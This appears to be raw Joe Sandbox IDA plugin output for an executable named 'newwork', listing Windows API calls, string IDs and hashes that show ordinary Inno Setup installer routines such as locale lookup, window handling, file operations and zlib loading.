                                                                                • Opcode Fuzzy Hash: e4b2ecfcfa893ff17553470f1835d2c21342bacfaf5c8ca03e615e843d4af16f
                                                                                • Instruction Fuzzy Hash: 61414C70A40208AFDF00EBA5DD42F9E7BB8EB08714F52457AF510F7291D7799E008B68
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,0042E51D,?,00000000,0047E6DC,00000000), ref: 0042E441
                                                                                • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042E447
                                                                                • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,0042E51D,?,00000000,0047E6DC,00000000), ref: 0042E495
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: AddressCloseHandleModuleProc
                                                                                • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$QaE$kernel32.dll
                                                                                • API String ID: 4190037839-2312295185
                                                                                • Opcode ID: 6084c433af3ee4d64f0cd9982e7ad42a34d4dd09e5920a5815d9b88696e74604
                                                                                • Instruction ID: f42d7e7755912f49377b3a3c2778cbb45b18f2cdc7334bb7b0fb93ca3fe573dd
                                                                                • Opcode Fuzzy Hash: 6084c433af3ee4d64f0cd9982e7ad42a34d4dd09e5920a5815d9b88696e74604
                                                                                • Instruction Fuzzy Hash: E8213230B10225BBDB10EAE6DC51B9E76B8EB44308F90447BA504E7281E77CDE419B5C
                                                                                APIs
                                                                                • GetActiveWindow.USER32 ref: 004629FC
                                                                                • GetModuleHandleA.KERNEL32(user32.dll), ref: 00462A10
                                                                                • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 00462A1D
                                                                                • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00462A2A
                                                                                • GetWindowRect.USER32(?,00000000), ref: 00462A76
                                                                                • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,00000000), ref: 00462AB4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                                                • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                                                • API String ID: 2610873146-3407710046
                                                                                • Opcode ID: 49e394185691d1c2da29acdf0cb3719649ef4a9244e3d7219ece30713ed86938
                                                                                • Instruction ID: 865a179037155f8fdabe2954c964c2dd38b7d55406d5d1e7c7801a7b23b437f8
                                                                                • Opcode Fuzzy Hash: 49e394185691d1c2da29acdf0cb3719649ef4a9244e3d7219ece30713ed86938
                                                                                • Instruction Fuzzy Hash: B7219575701B057BD610D6A88D85F3B36D8EB84715F094A2AF944DB3C1E6F8EC018B9A
                                                                                APIs
                                                                                • GetActiveWindow.USER32 ref: 0042F194
                                                                                • GetModuleHandleA.KERNEL32(user32.dll), ref: 0042F1A8
                                                                                • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 0042F1B5
                                                                                • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0042F1C2
                                                                                • GetWindowRect.USER32(?,00000000), ref: 0042F20E
                                                                                • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D), ref: 0042F24C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                                                • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                                                • API String ID: 2610873146-3407710046
                                                                                • Opcode ID: d786bd72f778b9cca068a569f688e0802e61ee9ccadb1309323c976dabd5d685
                                                                                • Instruction ID: 50a2e38ba83faf67dd7c56e8d7733487d454ef14a416094e89dadcccf0bf0910
                                                                                • Opcode Fuzzy Hash: d786bd72f778b9cca068a569f688e0802e61ee9ccadb1309323c976dabd5d685
                                                                                • Instruction Fuzzy Hash: 3821F279704710ABD300EA68ED41F3B37A9DB89714F88457AF944DB382DA79EC044BA9
                                                                                APIs
                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00458DFB,?,00000000,00458E5E,?,?,021A3858,00000000), ref: 00458C79
                                                                                • TransactNamedPipe.KERNEL32(?,-00000020,0000000C,-00004034,00000014,021A3858,?,00000000,00458D90,?,00000000,00000001,00000000,00000000,00000000,00458DFB), ref: 00458CD6
                                                                                • GetLastError.KERNEL32(?,-00000020,0000000C,-00004034,00000014,021A3858,?,00000000,00458D90,?,00000000,00000001,00000000,00000000,00000000,00458DFB), ref: 00458CE3
                                                                                • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00458D2F
                                                                                • GetOverlappedResult.KERNEL32(?,?,00000000,00000001,00458D69,?,-00000020,0000000C,-00004034,00000014,021A3858,?,00000000,00458D90,?,00000000), ref: 00458D55
                                                                                • GetLastError.KERNEL32(?,?,00000000,00000001,00458D69,?,-00000020,0000000C,-00004034,00000014,021A3858,?,00000000,00458D90,?,00000000), ref: 00458D5C
                                                                                  • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast$CreateEventMultipleNamedObjectsOverlappedPipeResultTransactWait
                                                                                • String ID: CreateEvent$TransactNamedPipe
                                                                                • API String ID: 2182916169-3012584893
                                                                                • Opcode ID: 7b509680db312d6d9eeee96a6ca75077f36d693cf911451bc7dd7bcd49c3517f
                                                                                • Instruction ID: 06b5d05a5e38ae799b2edb69ba26f0faef77b18cb4ad173b91f5c3c95d125767
                                                                                • Opcode Fuzzy Hash: 7b509680db312d6d9eeee96a6ca75077f36d693cf911451bc7dd7bcd49c3517f
                                                                                • Instruction Fuzzy Hash: EF418E75A00608AFDB15DF95C981F9EB7F8EB48714F1044AAF900F72D2DA789E44CA28
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(OLEAUT32.DLL,UnRegisterTypeLib,00000000,00456E85), ref: 00456D48
                                                                                • GetProcAddress.KERNEL32(00000000,OLEAUT32.DLL), ref: 00456D4E
                                                                                • LoadTypeLib.OLEAUT32(00000000,?), ref: 00456D9B
                                                                                  • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: AddressErrorHandleLastLoadModuleProcType
                                                                                • String ID: GetProcAddress$ITypeLib::GetLibAttr$LoadTypeLib$OLEAUT32.DLL$UnRegisterTypeLib$UnRegisterTypeLib
                                                                                • API String ID: 1914119943-2711329623
                                                                                • Opcode ID: e2963ea3afedc97cdb575031c9274042e2bd1e61e6c3a56a36b999a051922bf2
                                                                                • Instruction ID: d1bb8c6bfccdc0522a96f5e3020b18907c52df716e7671809b7eaf465cfb4023
                                                                                • Opcode Fuzzy Hash: e2963ea3afedc97cdb575031c9274042e2bd1e61e6c3a56a36b999a051922bf2
                                                                                • Instruction Fuzzy Hash: 6831A375A00604AFDB41EFAACC12D5BB7BDEB8970675244A6FD04D3352DB38DD08CA28
                                                                                APIs
                                                                                • RectVisible.GDI32(?,?), ref: 00416E13
                                                                                • SaveDC.GDI32(?), ref: 00416E27
                                                                                • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00416E4A
                                                                                • RestoreDC.GDI32(?,?), ref: 00416E65
                                                                                • CreateSolidBrush.GDI32(00000000), ref: 00416EE5
                                                                                • FrameRect.USER32(?,?,?), ref: 00416F18
                                                                                • DeleteObject.GDI32(?), ref: 00416F22
                                                                                • CreateSolidBrush.GDI32(00000000), ref: 00416F32
                                                                                • FrameRect.USER32(?,?,?), ref: 00416F65
                                                                                • DeleteObject.GDI32(?), ref: 00416F6F
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
                                                                                • String ID:
                                                                                • API String ID: 375863564-0
                                                                                • Opcode ID: c69605c35faac69eeef83e1ef2bcb629ef32bf90482d96ab6e01708da643fe70
                                                                                • Instruction ID: c082a38e55a2621cff38c0036c5e412d4739722926df34ebe37a7eff5f7859fc
                                                                                • Opcode Fuzzy Hash: c69605c35faac69eeef83e1ef2bcb629ef32bf90482d96ab6e01708da643fe70
                                                                                • Instruction Fuzzy Hash: 70515A712086459FDB50EF69C8C4B9B77E8AF48314F15466AFD488B286C738EC81CB99
                                                                                APIs
                                                                                • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B46
                                                                                • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B6A
                                                                                • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B86
                                                                                • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00404BA7
                                                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00404BD0
                                                                                • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00404BDA
                                                                                • GetStdHandle.KERNEL32(000000F5), ref: 00404BFA
                                                                                • GetFileType.KERNEL32(?,000000F5), ref: 00404C11
                                                                                • CloseHandle.KERNEL32(?,?,000000F5), ref: 00404C2C
                                                                                • GetLastError.KERNEL32(000000F5), ref: 00404C46
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                                • String ID:
                                                                                • API String ID: 1694776339-0
                                                                                • Opcode ID: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                                                • Instruction ID: 0555156f4d2a620bb114dc01d937536d57074fdea11cd86abdfeb4dd56d828b4
                                                                                • Opcode Fuzzy Hash: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                                                • Instruction Fuzzy Hash: 3741B3F02093009AF7305E248905B2375E5EBC0755F208E3FE296BA6E0D7BDE8458B1D
                                                                                APIs
                                                                                • GetSystemMenu.USER32(00000000,00000000), ref: 00422233
                                                                                • DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 00422251
                                                                                • DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0042225E
                                                                                • DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0042226B
                                                                                • DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00422278
                                                                                • DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 00422285
                                                                                • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 00422292
                                                                                • DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 0042229F
                                                                                • EnableMenuItem.USER32(00000000,0000F020,00000001), ref: 004222BD
                                                                                • EnableMenuItem.USER32(00000000,0000F030,00000001), ref: 004222D9
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Menu$Delete$EnableItem$System
                                                                                • String ID:
                                                                                • API String ID: 3985193851-0
                                                                                • Opcode ID: 794ac4a4d1563d503d4e128f610caca5ba976f2c29ed192f4e654ec8c2abe850
                                                                                • Instruction ID: 662ae76830c3dbb110fd6952920e185112f137d20e740dc0dcce1beff7d7cd05
                                                                                • Opcode Fuzzy Hash: 794ac4a4d1563d503d4e128f610caca5ba976f2c29ed192f4e654ec8c2abe850
                                                                                • Instruction Fuzzy Hash: AF2144703407047AE720E724CD8BF9BBBD89B04708F5451A5BA487F6D3C6F9AB804698
                                                                                APIs
                                                                                • FreeLibrary.KERNEL32(10000000), ref: 00481A11
                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00481A25
                                                                                • SendNotifyMessageA.USER32(0002047E,00000496,00002710,00000000), ref: 00481A97
                                                                                Strings
                                                                                • GetCustomSetupExitCode, xrefs: 004818B1
                                                                                • Restarting Windows., xrefs: 00481A72
                                                                                • DeinitializeSetup, xrefs: 0048190D
                                                                                • Deinitializing Setup., xrefs: 00481872
                                                                                • Not restarting Windows because Setup is being run from the debugger., xrefs: 00481A46
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: FreeLibrary$MessageNotifySend
                                                                                • String ID: DeinitializeSetup$Deinitializing Setup.$GetCustomSetupExitCode$Not restarting Windows because Setup is being run from the debugger.$Restarting Windows.
                                                                                • API String ID: 3817813901-1884538726
                                                                                • Opcode ID: b2d1279a618dd00e76101f6ddb87be929459601488252b11527f6c6d16611b1a
                                                                                • Instruction ID: b122ee3e0244d1cffd13458a0655c780be2d4a3cdc4850abd58d30bc7702deed
                                                                                • Opcode Fuzzy Hash: b2d1279a618dd00e76101f6ddb87be929459601488252b11527f6c6d16611b1a
                                                                                • Instruction Fuzzy Hash: C651BF347042409FD715EB69E9A5B6E7BE8EB19314F10887BE800C72B2DB389C46CB5D
                                                                                APIs
                                                                                • SHGetMalloc.SHELL32(?), ref: 004616C7
                                                                                • GetActiveWindow.USER32 ref: 0046172B
                                                                                • CoInitialize.OLE32(00000000), ref: 0046173F
                                                                                • SHBrowseForFolder.SHELL32(?), ref: 00461756
                                                                                • CoUninitialize.OLE32(00461797,00000000,?,?,?,?,?,00000000,0046181B), ref: 0046176B
                                                                                • SetActiveWindow.USER32(?,00461797,00000000,?,?,?,?,?,00000000,0046181B), ref: 00461781
                                                                                • SetActiveWindow.USER32(?,?,00461797,00000000,?,?,?,?,?,00000000,0046181B), ref: 0046178A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: ActiveWindow$BrowseFolderInitializeMallocUninitialize
                                                                                • String ID: A
                                                                                • API String ID: 2684663990-3554254475
                                                                                • Opcode ID: cb3d39f68a826354347aa7a8a61ff080deb010c50648a66159b3978de9eda5bc
                                                                                • Instruction ID: 0f37cca2ee7d5c89cd5c8fe3b5c5f67eac08b275376d6c087401a1ac056189be
                                                                                • Opcode Fuzzy Hash: cb3d39f68a826354347aa7a8a61ff080deb010c50648a66159b3978de9eda5bc
                                                                                • Instruction Fuzzy Hash: C3312F70E00348AFDB10EFA6D885A9EBBF8EB09304F55847AF404E7251E7785A048F59
                                                                                APIs
                                                                                • GetFileAttributesA.KERNEL32(00000000,00000000,00472AB9,?,?,?,00000008,00000000,00000000,00000000,?,00472D15,?,?,00000000,00472F84), ref: 00472A1C
                                                                                  • Part of subcall function 0042CD94: GetPrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0042CE0A
                                                                                  • Part of subcall function 00406F50: DeleteFileA.KERNEL32(00000000,0049B628,004986F1,00000000,00498746,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F5B
                                                                                • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00472AB9,?,?,?,00000008,00000000,00000000,00000000,?,00472D15), ref: 00472A93
                                                                                • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00472AB9,?,?,?,00000008,00000000,00000000,00000000), ref: 00472A99
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: File$Attributes$DeleteDirectoryPrivateProfileRemoveString
                                                                                • String ID: .ShellClassInfo$CLSID2$desktop.ini$target.lnk${0AFACED1-E828-11D1-9187-B532F1E9575D}
                                                                                • API String ID: 884541143-1710247218
                                                                                • Opcode ID: c45dacd24f7b5bc8c90ad3d0814151273abff7c22a7deb77a2667df06dffab17
                                                                                • Instruction ID: 1765d5ebfc4e6887f49e3816ac39c9d5a3c16910e93b0aec031ce55b1572895b
                                                                                • Opcode Fuzzy Hash: c45dacd24f7b5bc8c90ad3d0814151273abff7c22a7deb77a2667df06dffab17
                                                                                • Instruction Fuzzy Hash: 6711B2707005147BD721EAAA8D82B9F73ACDB49714F61C17BB404B72C2DBBCAE01861C
                                                                                APIs
                                                                                • GetProcAddress.KERNEL32(00000000,inflateInit_), ref: 0045D2BD
                                                                                • GetProcAddress.KERNEL32(00000000,inflate), ref: 0045D2CD
                                                                                • GetProcAddress.KERNEL32(00000000,inflateEnd), ref: 0045D2DD
                                                                                • GetProcAddress.KERNEL32(00000000,inflateReset), ref: 0045D2ED
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc
                                                                                • String ID: inflate$inflateEnd$inflateInit_$inflateReset
                                                                                • API String ID: 190572456-3516654456
                                                                                • Opcode ID: 5039b32c95ab4f878aa340bc95ef1656196d0563f790867e571847c0b893819f
                                                                                • Instruction ID: d913f85fec6517a53d2ec7ba369195fd603025f4bffd93910817278a70f0814a
                                                                                • Opcode Fuzzy Hash: 5039b32c95ab4f878aa340bc95ef1656196d0563f790867e571847c0b893819f
                                                                                • Instruction Fuzzy Hash: C20112B0D00701DBE724DFF6ACC672636A5ABA8306F14C03B9D09962A2D77D0459DF2E
                                                                                APIs
                                                                                • SetBkColor.GDI32(?,00000000), ref: 0041A9B9
                                                                                • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 0041A9F3
                                                                                • SetBkColor.GDI32(?,?), ref: 0041AA08
                                                                                • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00CC0020), ref: 0041AA52
                                                                                • SetTextColor.GDI32(00000000,00000000), ref: 0041AA5D
                                                                                • SetBkColor.GDI32(00000000,00FFFFFF), ref: 0041AA6D
                                                                                • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00E20746), ref: 0041AAAC
                                                                                • SetTextColor.GDI32(00000000,00000000), ref: 0041AAB6
                                                                                • SetBkColor.GDI32(00000000,?), ref: 0041AAC3
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Color$StretchText
                                                                                • String ID:
                                                                                • API String ID: 2984075790-0
                                                                                • Opcode ID: c2c61a06e11fc6ac6c72d0136d8e20986a2ab5507b690e8d84a304c9a27ba9fd
                                                                                • Instruction ID: 4467ea82dd13d464879b0bd0dd0607b47ee3045dce17e21d2c6451b7f26a8ea4
                                                                                • Opcode Fuzzy Hash: c2c61a06e11fc6ac6c72d0136d8e20986a2ab5507b690e8d84a304c9a27ba9fd
                                                                                • Instruction Fuzzy Hash: 8761E5B5A00505AFCB40EFADD985E9AB7F8EF08314B10816AF908DB262C775ED40CF58
                                                                                APIs
                                                                                  • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
